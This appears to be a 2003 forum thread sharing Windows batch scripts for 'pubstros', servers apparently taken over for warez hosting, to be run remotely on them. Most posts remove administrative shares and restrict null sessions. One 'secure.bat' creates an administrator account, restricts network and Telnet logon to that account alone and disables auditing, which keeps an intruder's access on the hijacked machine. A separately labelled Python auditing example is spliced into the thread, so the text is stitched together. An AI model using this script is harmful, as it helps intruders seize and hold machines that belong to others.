Full Version: Securer
twelve
With it you can protect your pubstros; just execute it remotely.
With this, you can protect your stros.

Sorry if it is already posted.
Sorry if this has already been posted.
][no0b][
It's a Backdoor.Iroffer.1213.

That's all that you are able to ...
twelve
No!!
It isn't a backdoor!!!
][no0b][
My antivirus identified it as:

Backdoor.Iroffer.1213

That's all I can say!
bratt
Moderator, remove this file, it is a backdoor.
isaiah
This is for NT.
OneNight
Hey twelve.

Firstly, thanks for contributing! That's what we like to see!
Secondly, for keeping it bilingual! Not excluding anyone is a good thing.

Lastly, guys, this isn't a backdoor. A lot of AV software goes a little over the top and will identify files as viruses or backdoors etc. even though the files aren't anything of the sort. Still, err on the side of caution!

Open it with Notepad (or any text editor you have) and check out its contents. It's a very basic bat which will delete the different network shares. It's a half-hearted attempt to secure a machine from being vulnerable via a null session (AFAIK). Here is the .bat's content:

rem Remove the administrative shares (drive letters C$..Z$, ADMIN$, IPC$, print$, lwc$)
rem for the current session; /y suppresses the confirmation prompt.
rem Note: Windows recreates these shares at the next boot, so this is not persistent.
net share /delete C$ /y
net share /delete D$ /y
net share /delete E$ /y
net share /delete F$ /y
net share /delete G$ /y
net share /delete H$ /y
net share /delete I$ /y
net share /delete J$ /y
net share /delete K$ /y
net share /delete L$ /y
net share /delete M$ /y
net share /delete N$ /y
net share /delete O$ /y
net share /delete P$ /y
net share /delete Q$ /y
net share /delete R$ /y
net share /delete S$ /y
net share /delete T$ /y
net share /delete U$ /y
net share /delete V$ /y
net share /delete W$ /y
net share /delete X$ /y
net share /delete Y$ /y
net share /delete Z$ /y
net share /delete ADMIN$ /y
net share /delete IPC$ /y
net share /delete lwc$ /y
net share /delete print$ /y
rem Repeated in the original; harmless if the share is already gone.
net share /delete C$ /y
net share /delete ADMIN$
net share /delete IPC$
twelve
hihi thanks
MKZ
Thanks.

But the only problem is that as soon as the sysop reboots his machine everything goes back to normal; your .bat has no more effect.
KuerbY
Bad method to secure your Windows machine. I use this code:

@echo off
rem Remove the administrative shares for this session (/y skips the confirmation prompt)
net share /delete C$ /y
net share /delete D$ /y
net share /delete E$ /y
net share /delete F$ /y
net share /delete G$ /y
net share /delete H$ /y
net share /delete I$ /y
net share /delete J$ /y
net share /delete K$ /y
net share /delete L$ /y
net share /delete M$ /y
net share /delete N$ /y
net share /delete O$ /y
net share /delete P$ /y
net share /delete Q$ /y
net share /delete R$ /y
net share /delete S$ /y
net share /delete T$ /y
net share /delete U$ /y
net share /delete V$ /y
net share /delete W$ /y
net share /delete X$ /y
net share /delete Y$ /y
net share /delete Z$ /y
net share /delete ADMIN$ /y
net share /delete IPC$ /y
net share /delete lwc$ /y
net share /delete print$ /y
rem Stop services that expose the machine on the network. There is no service named
rem "netbios" on Windows 2000/XP and the RPC service cannot be stopped, so those
rem lines fail harmlessly; the others stop until the next reboot.
net stop messenger
net stop netbios
net stop "Remote Registry Service"
net stop "Computer Browser"
net stop "REMOTE PROCEDURE CALL"
net stop "REMOTE PROCEDURE CALL SERVICE"
net stop "Remote Access Connection Manager"
net stop "telnet"
rem Repeat the most important deletes and keep their output in net.deld
net share /delete C$ /y > net.deld
net share /delete ADMIN$ >> net.deld
net share /delete IPC$ >> net.deld

Have fun.
][no0b][
If it's so...

then sorry @ twelve.
twelve
Thanks for the code.
virus
lol ......
It seems that everyone wants to get rid of the hidden shares in Win2K, WinXP et al., but I would like to point out that using a batch program to disable the shares is a tedious task. I mean, every time you restart Windows you have to run the batch file because the hidden shares will be enabled on system restart. So why not get rid of these shares for good ... we can do it the "REG" way ....
Here is the key which creates shares on every boot; disable it and you'll be able to sleep in peace.

:: Key to disable NULL Sessions
Key: HKLM\SYSTEM\CurrentControlSet\Control\Lsa
Value: restrictanonymous
Type: REG_DWORD
Data: 1

This is how I do it. I've got a batch file which disables all the unnecessary services. It's been uploaded in the 'System Hardening' section. You can have a look at it and make changes if required. I've commented it as well in case anyone needs to know what's happening.
Thank you ....
maZer`-
LOL!
That isn't a backdoor!
Iroffer, that's an XDCC bot! ;D
twelve
QUOTE (digger @ Aug 24 2003, 07:46 PM)
lol ......
It seems that everyone wants to get rid of the hidden shares in Win2K, WinXP et al., but I would like to point out that using a batch program to disable the shares is a tedious task. I mean, every time you restart Windows you have to run the batch file because the hidden shares will be enabled on system restart. So why not get rid of these shares for good ... we can do it the "REG" way ....
Here is the key which creates shares on every boot; disable it and you'll be able to sleep in peace.

:: Key to disable NULL Sessions
Key: HKLM\SYSTEM\CurrentControlSet\Control\Lsa
Value: restrictanonymous
Type: REG_DWORD
Data: 1

This is how I do it. I've got a batch file which disables all the unnecessary services. It's been uploaded in the 'System Hardening' section. You can have a look at it and make changes if required. I've commented it as well in case anyone needs to know what's happening.
Thank you ....

Yes, for the restrict anonymous, I always do it.
Thanks dude.
KuerbY
Yes digger...
Securing with the help of the registry is the best way,
but he had posted a .bat which is not so good, so
I thought I'd show them a better script.

Greetz, KuerbY
MpR
LOL, here's a secure bat.


rem Blocks all netbios connections from all accounts except the one specified
rem secure.bat username password

@echo off
del temp
echo [Version] >> temp
echo signature="$CHICAGO$" >> temp
echo Revision=1 >> temp
echo [Profile Description] >> temp
echo Description=Default Security Settings. (Windows 2000 Professional) >> temp
echo [System Access] >> temp
echo MinimumPasswordAge = 0 >> temp
echo MaximumPasswordAge = 42 >> temp
echo MinimumPasswordLength = 0 >> temp
echo PasswordComplexity = 0 >> temp
echo PasswordHistorySize = 0 >> temp
echo LockoutBadCount = 0 >> temp
echo RequireLogonToChangePassword = 0 >> temp
echo ClearTextPassword = 0 >> temp
echo [Event Audit] >> temp
echo AuditSystemEvents = 0 >> temp
echo AuditLogonEvents = 0 >> temp
echo AuditObjectAccess = 0 >> temp
echo AuditPrivilegeUse = 0 >> temp
echo AuditPolicyChange = 0 >> temp
echo AuditAccountManage = 0 >> temp
echo AuditProcessTracking = 0 >> temp
echo AuditDSAccess = 0 >> temp
echo AuditAccountLogon = 0 >> temp
echo [Registry Values] >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\signsecurechannel=4,1 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\sealsecurechannel=4,1 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\requirestrongkey=4,0 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\requiresignorseal=4,0 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\disablepasswordchange=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\requiresecuritysignature=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\enablesecuritysignature=4,1 >> temp
echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\enableplaintextpassword=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\requiresecuritysignature=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\enablesecuritysignature=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\enableforcedlogoff=4,1 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\autodisconnect=4,15 >> temp
echo machine\system\currentcontrolset\control\session manager\protectionmode=4,1 >> temp
echo machine\system\currentcontrolset\control\session manager\memory management\clearpagefileatshutdown=4,0 >> temp
echo machine\system\currentcontrolset\control\print\providers\lanman print services\servers\addprinterdrivers=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\restrictanonymous=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\lmcompatibilitylevel=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\fullprivilegeauditing=3,0 >> temp
echo machine\system\currentcontrolset\control\lsa\crashonauditfail=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\auditbaseobjects=4,0 >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\shutdownwithoutlogon=4,1 >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\legalnoticetext=1, >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\legalnoticecaption=1, >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\dontdisplaylastusername=4,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\scremoveoption=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\passwordexpirywarning=4,14 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\cachedlogonscount=1,10 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatefloppies=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatedasd=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatecdroms=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\setcommand=4,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\securitylevel=4,0 >> temp
echo [Privilege Rights] >> temp
echo seassignprimarytokenprivilege = >> temp
echo seauditprivilege = >> temp
echo sebackupprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
echo sebatchlogonright = >> temp
echo sechangenotifyprivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-1-0 >> temp
echo secreatepagefileprivilege = *S-1-5-32-544 >> temp
echo secreatepermanentprivilege = >> temp
echo secreatetokenprivilege = >> temp
echo sedebugprivilege = *S-1-5-32-544 >> temp
echo sedenybatchlogonright = >> temp
echo sedenyinteractivelogonright = >> temp
echo sedenynetworklogonright = >> temp
echo sedenyservicelogonright = >> temp
echo seenabledelegationprivilege = >> temp
echo seincreasebasepriorityprivilege = *S-1-5-32-544 >> temp
echo seincreasequotaprivilege = *S-1-5-32-544 >> temp
echo seinteractivelogonright = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-5-21-1960408961-1637723038-1801674531-501 >> temp
echo seloaddriverprivilege = *S-1-5-32-544 >> temp
echo selockmemoryprivilege = >> temp
echo semachineaccountprivilege = >> temp
echo senetworklogonright = %1 >> temp
echo seprofilesingleprocessprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp
echo seremoteshutdownprivilege = *S-1-5-32-544 >> temp
echo serestoreprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
echo sesecurityprivilege = *S-1-5-32-544 >> temp
echo seservicelogonright = >> temp
echo seshutdownprivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545 >> temp
echo sesyncagentprivilege = >> temp
echo sesystemenvironmentprivilege = *S-1-5-32-544 >> temp
echo sesystemprofileprivilege = *S-1-5-32-544 >> temp
echo sesystemtimeprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp
echo setakeownershipprivilege = *S-1-5-32-544 >> temp
echo setcbprivilege = >> temp
echo seundockprivilege = *S-1-5-32-544,*S-1-5-32-547,*S-1-5-32-545 >> temp

rem Create the account given on the command line, make it a local administrator and
rem apply the template's user-rights section (note that %2 puts the password on the command line).
net user /add %1 %2
net localgroup administrators %1 /add
secedit.exe /configure /areas USER_RIGHTS /db C:\winnt\temp\temp.mdb /CFG temp

del %SystemRoot%\system32\login.cmd
echo @echo off >> %SystemRoot%\system32\login.cmd
echo rem >> %SystemRoot%\system32\login.cmd
echo rem Default global login script for the Telnet Server >> %SystemRoot%\system32\login.cmd
echo rem >> %SystemRoot%\system32\login.cmd
echo rem In the default setup, this command script is executed when the >> %SystemRoot%\system32\login.cmd
echo rem initial command shell is invoked. It, in turn, will try to invoke >> %SystemRoot%\system32\login.cmd
echo rem the individual user's login script. >> %SystemRoot%\system32\login.cmd
echo rem >> %SystemRoot%\system32\login.cmd

echo if %%USERNAME%%==%1 goto good >> %SystemRoot%\system32\login.cmd
echo exit >> %SystemRoot%\system32\login.cmd
echo :good >> %SystemRoot%\system32\login.cmd

echo echo *=============================================================== >> %SystemRoot%\system32\login.cmd
echo echo Welcome to Microsoft Telnet Server. >> %SystemRoot%\system32\login.cmd
echo echo *=============================================================== >> %SystemRoot%\system32\login.cmd

rem Both variables need doubled %% so they are written literally and expanded when login.cmd runs
echo cd /d %%HOMEDRIVE%%%%HOMEPATH%% >> %SystemRoot%\system32\login.cmd
del temp

rem Set the Remote Registry service to manual start (Start=3) and stop it for this session.
rem The .reg format expects a blank line after the REGEDIT4 header, hence the echo.
del root.reg
echo REGEDIT4 >> root.reg
echo. >> root.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RemoteRegistry\] >> root.reg
echo "Start"=dword:00000003 >> root.reg
regedit /S root.reg
net stop RemoteRegistry
del root.reg
virus
A really nice batch program. Nice piece of code, I really like batch.
Just one question, is it yours? If not, then I suggest that you reference it please. And if it's yours, then I need some classes.
By the way, Norton sounded its alarms saying that it's a trojan. So I assume that it was written quite some time back and was loose on the Internet.
Head_Hunter
You might want to update the restrictanonymous = 2.
Also this doesn't really work with XP anymore. Use restrictanonymoussam = 1.

Thanks for posting the .bats, guys.
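An added example (not code from the thread) that parses the secedit template format MpR's secure.bat writes and flags the values Head_Hunter objects to; the sample template is constructed from a few of MpR's lines, and the password thresholds are this example's own assumptions:

```python
# Constructed sample: a few [System Access] and [Registry Values] lines from MpR's template above.
SAMPLE_TEMPLATE = r"""[System Access]
MinimumPasswordLength = 0
PasswordComplexity = 0
[Registry Values]
machine\system\currentcontrolset\control\lsa\restrictanonymous=4,0
machine\system\currentcontrolset\control\lsa\lmcompatibilitylevel=4,0
machine\system\currentcontrolset\services\lanmanserver\parameters\enablesecuritysignature=4,0
"""

# (section, key suffix, predicate that must hold, finding). Anonymous-access thresholds follow
# Head_Hunter's advice (restrictanonymous=2, restrictanonymoussam=1 on XP); the rest are assumed.
CHECKS = [
    ("System Access", "minimumpasswordlength", lambda v: v >= 8, "empty passwords allowed"),
    ("System Access", "passwordcomplexity", lambda v: v == 1, "complexity not enforced"),
    ("Registry Values", "lsa\\restrictanonymous", lambda v: v >= 2, "null sessions allowed"),
    ("Registry Values", "lsa\\restrictanonymoussam", lambda v: v == 1, "needed on XP"),
    ("Registry Values", "lsa\\lmcompatibilitylevel", lambda v: v >= 2, "LM responses still sent"),
    ("Registry Values", "lanmanserver\\parameters\\enablesecuritysignature", lambda v: v == 1, "SMB signing off"),
]

def parse_template(text):
    """Return {section: {lowercased key: int}}; registry lines are 'type,data' and only data is kept."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections[current] = {}
        elif current is not None and "=" in line and not line.startswith(";"):
            key, value = (s.strip() for s in line.split("=", 1))
            if current == "Registry Values" and "," in value:
                value = value.split(",", 1)[1]  # drop the REG_* type prefix, e.g. '4,0' -> '0'
            try:
                sections[current][key.lower()] = int(value)
            except ValueError:
                pass  # string data (legalnoticetext etc.) and SID lists are not audited
    return sections

def audit(text):
    """Return [(key suffix, finding)] for every check that fails or whose key is absent."""
    findings, sections = [], parse_template(text)
    for section, suffix, ok, msg in CHECKS:
        hits = [v for k, v in sections.get(section, {}).items() if k.endswith(suffix)]
        if not hits:
            findings.append((suffix, "missing: " + msg))
        elif not ok(hits[0]):
            findings.append((suffix, "value %d: %s" % (hits[0], msg)))
    return findings
```

Run `audit(open("temp").read())` against the file secure.bat leaves behind to see the same six findings the sample produces.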
MpR
I think that bat's been modded for the last 2 years. If I were to reference anyone it would be a person per letter; a lot of people have put in a lot of work. That's all I know, and no way I'll take credit for it all.
Wavid
Can anyone give me the bat file code to make that registry change to restrict anonymous for both WinXP and the other?
virus
Try searching the forum for 'restrict anonymous' and hopefully you'll find it. I posted the key some time back.
PegHorse
QUOTE (MKZ @ Aug 23 2003, 11:32 AM)
Thanks.

But the only problem is that as soon as the sysop reboots his machine everything goes back to normal; your .bat has no more effect.

Yes, but if you use Firedaemon, you can install your .bat as a service.
virus
Oaaa! Only English please.
virus
Same post, page 1.
Wavid
digger, I can't seem to find the topic where you discuss the key. Can you remember what it is? I'm looking to put it in a .bat file.
Wavid
I've whacked this together from the previous pages.

CODE
@echo off
rem Remove the administrative shares for this session (/y skips the confirmation prompt)
net share /delete C$ /y
net share /delete D$ /y
net share /delete E$ /y
net share /delete F$ /y
net share /delete G$ /y
net share /delete H$ /y
net share /delete I$ /y
net share /delete J$ /y
net share /delete K$ /y
net share /delete L$ /y
net share /delete M$ /y
net share /delete N$ /y
net share /delete O$ /y
net share /delete P$ /y
net share /delete Q$ /y
net share /delete R$ /y
net share /delete S$ /y
net share /delete T$ /y
net share /delete U$ /y
net share /delete V$ /y
net share /delete W$ /y
net share /delete X$ /y
net share /delete Y$ /y
net share /delete Z$ /y
net share /delete ADMIN$ /y
net share /delete IPC$ /y

rem Stop the services that expose the machine on the network. Stopping "server" removes
rem every share anyway, and the RPC service cannot be stopped, so that line fails harmlessly.
net stop "Computer Browser" /y
net stop "server" /y
net stop "Remote Access Connection Manager" /y
net stop "REMOTE PROCEDURE CALL" /y
net stop "REMOTE PROCEDURE CALL SERVICE" /y
net stop "messenger" /y
net stop "netbios" /y

rem Make the anonymous restriction persistent in the registry: restrictanonymous=2 for
rem Windows 2000 and restrictanonymoussam=1 for XP, as recommended earlier in the thread.
rem The .reg format expects a blank line after the REGEDIT4 header, hence the echo.
del root.reg
echo REGEDIT4 >> root.reg
echo. >> root.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] >> root.reg
echo "restrictanonymous"=dword:00000002 >> root.reg
echo "restrictanonymoussam"=dword:00000001 >> root.reg
regedit /S root.reg
del root.reg

net stop "Remote Registry Service" /y


What does everyone think?
ArEs
Yeah, mazer is right there, iroffer is a DCC bot, but many AVs alert against harmful (but for others) programs... Ever scanned pqak? It's marked as a virus too, because it's a powerful utility for bruteforcing net shares... But wtf is a DCC bot doing in a batch? I suggest: take the code up there, save your own bat, just so you can be sure you're not catching a bot on your system...